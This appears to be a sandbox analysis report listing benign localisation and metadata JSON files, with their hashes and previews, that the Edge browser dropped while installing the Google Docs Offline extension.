SHA-512:	C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
Malicious:	false
Preview:	{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\sk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	4.882122893545996
Encrypted:	false
SSDEEP:	24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
MD5:	8E55817BF7A87052F11FE554A61C52D5
SHA1:	9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
SHA-256:	903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
SHA-512:	EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\sl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	4.6041913416245
Encrypted:	false
SSDEEP:	12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
MD5:	BFAEFEFF32813DF91C56B71B79EC2AF4
SHA1:	F8EDA2B632610972B581724D6B2F9782AC37377B
SHA-256:	AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
SHA-512:	971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\sr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	4.569671329405572
Encrypted:	false
SSDEEP:	24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
MD5:	7F5F8933D2D078618496C67526A2B066
SHA1:	B7050E3EFA4D39548577CF47CB119FA0E246B7A4
SHA-256:	4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
SHA-512:	0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\sv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	884
Entropy (8bit):	4.627108704340797
Encrypted:	false
SSDEEP:	24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
MD5:	90D8FB448CE9C0B9BA3D07FB8DE6D7EE
SHA1:	D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
SHA-256:	64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
SHA-512:	6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\sw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	980
Entropy (8bit):	4.50673686618174
Encrypted:	false
SSDEEP:	12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
MD5:	D0579209686889E079D87C23817EDDD5
SHA1:	C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
SHA-256:	0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
SHA-512:	D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
Malicious:	false
Preview:	{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\ta\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1941
Entropy (8bit):	4.132139619026436
Encrypted:	false
SSDEEP:	24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
MD5:	DCC0D1725AEAEAAF1690EF8053529601
SHA1:	BB9D31859469760AC93E84B70B57909DCC02EA65
SHA-256:	6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
SHA-512:	6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\te\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1969
Entropy (8bit):	4.327258153043599
Encrypted:	false
SSDEEP:	48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
MD5:	385E65EF723F1C4018EEE6E4E56BC03F
SHA1:	0CEA195638A403FD99BAEF88A360BD746C21DF42
SHA-256:	026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
SHA-512:	E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\th\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1674
Entropy (8bit):	4.343724179386811
Encrypted:	false
SSDEEP:	48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
MD5:	64077E3D186E585A8BEA86FF415AA19D
SHA1:	73A861AC810DABB4CE63AD052E6E1834F8CA0E65
SHA-256:	D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
SHA-512:	56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\tr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	4.853399816115876
Encrypted:	false
SSDEEP:	24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
MD5:	76B59AAACC7B469792694CF3855D3F4C
SHA1:	7C04A2C1C808FA57057A4CCEEE66855251A3C231
SHA-256:	B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
SHA-512:	2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\uk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1333
Entropy (8bit):	4.686760246306605
Encrypted:	false
SSDEEP:	24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
MD5:	970963C25C2CEF16BB6F60952E103105
SHA1:	BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
SHA-256:	9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
SHA-512:	1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\ur\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1263
Entropy (8bit):	4.861856182762435
Encrypted:	false
SSDEEP:	24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
MD5:	8B4DF6A9281333341C939C244DDB7648
SHA1:	382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
SHA-256:	5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
SHA-512:	FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\vi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	5.062722522759407
Encrypted:	false
SSDEEP:	24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
MD5:	773A3B9E708D052D6CBAA6D55C8A5438
SHA1:	5617235844595D5C73961A2C0A4AC66D8EA5F90F
SHA-256:	597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
SHA-512:	E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\zh_CN\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	5.7905809868505544
Encrypted:	false
SSDEEP:	12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
MD5:	3E76788E17E62FB49FB5ED5F4E7A3DCE
SHA1:	6904FFA0D13D45496F126E58C886C35366EFCC11
SHA-256:	E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
SHA-512:	F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\zh_HK\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	4.50367724745418
Encrypted:	false
SSDEEP:	24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
MD5:	524E1B2A370D0E71342D05DDE3D3E774
SHA1:	60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
SHA-256:	30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
SHA-512:	D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
Malicious:	false
Preview:	{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\zh_TW\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	843
Entropy (8bit):	5.76581227215314
Encrypted:	false
SSDEEP:	12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
MD5:	0E60627ACFD18F44D4DF469D8DCE6D30
SHA1:	2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
SHA-256:	F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
SHA-512:	6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\zu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	912
Entropy (8bit):	4.65963951143349
Encrypted:	false
SSDEEP:	24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
MD5:	71F916A64F98B6D1B5D1F62D297FDEC1
SHA1:	9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
SHA-256:	EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
SHA-512:	30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
Malicious:	false
Preview:	{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	11280
Entropy (8bit):	5.752941882424501
Encrypted:	false
SSDEEP:	192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvVpfcNLFev:m8IEI4u8ROxev
MD5:	F897300492E3AB467E56883D23D02D77
SHA1:	DECD6DC9E70ECCF9B45983147680614C019B99EA
SHA-256:	F9B3A5747DEDCB5AED58FCFC0F4FD3BD2F2E903F2CCEF90A92A73DBC0F8C3DBD
SHA-512:	B8AC574E24814BAF04A264E7F3F00B4285CD7B66104DFC77897440A898FCA5230775300EC7DEF723678975A04C2CD1BC73A44F77DA26262E8704029930990C62
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJs